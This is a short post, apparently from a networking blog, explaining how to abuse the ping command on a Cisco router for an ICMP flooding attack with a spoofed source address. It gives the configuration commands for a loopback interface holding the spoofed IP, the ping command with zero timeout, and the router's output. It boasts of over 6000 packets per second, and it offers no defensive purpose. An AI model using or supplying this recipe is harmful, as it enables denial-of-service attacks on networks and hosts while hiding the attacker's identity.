cisco PING Command for icmp FLooding |
PING
it's very easy to abuse the Ping command, for a simple ICMP Flooding attack, and if you like, you can create a spoofed Source IP.
Remember the Ping Options:
evil-router#ping 1.2.3.4 ?
data specify data pattern
df-bit enable do not fragment bit in IP header
repeat specify repeat count
size specify datagram size
source specify source address or name
timeout specify timeout interval
validate validate reply data
<CR>
Some Options are very usefull, if you put it together in the right way.
- First you must create a Loopback Interface with the IP address, you like to spoofe.
- then find out, what you like to do, Small packets, for flooding, or large Packets for filling up the Line.The Option Size can be between 38 to ~18000
- repeat is simlpe the couter for the packages.
- and now "timeout" is the timer to wait for the answer, but for flooding, we don't like to wait for the answer, and we fix the timeout to zero "0"
evil-router#conf t
Configuration mode locked exclusively. The lock will be cleared once you exit out of configuration mode using end/exit
Enter configuration commands, one per line. End with CNTL/Z.
evil-router(config)#interface loopback 1
evil-router(config-if)#ip address 1.2.3.4 255.255.255.255
evil-router(config-if)#no shutdown
evil-router(config-if)#exit
evil-router(config)#exit
evil-router#
evil-router#ping 192.168.1.1 source 1.2.3.4 repeat 10 size 64 timeout 0
Type escape sequence to abort.
Sending 10, 64-byte ICMP Echos to 192.168.1.1, timeout is 0 seconds:
Packet sent with a source address of 1.2.3.4
..........
Success rate is 0 percent (0/10)
With this smale Script, i create on a 100Mbit/s link over 6000 ICMP packets/sec. on a Cisco 1803.
|
|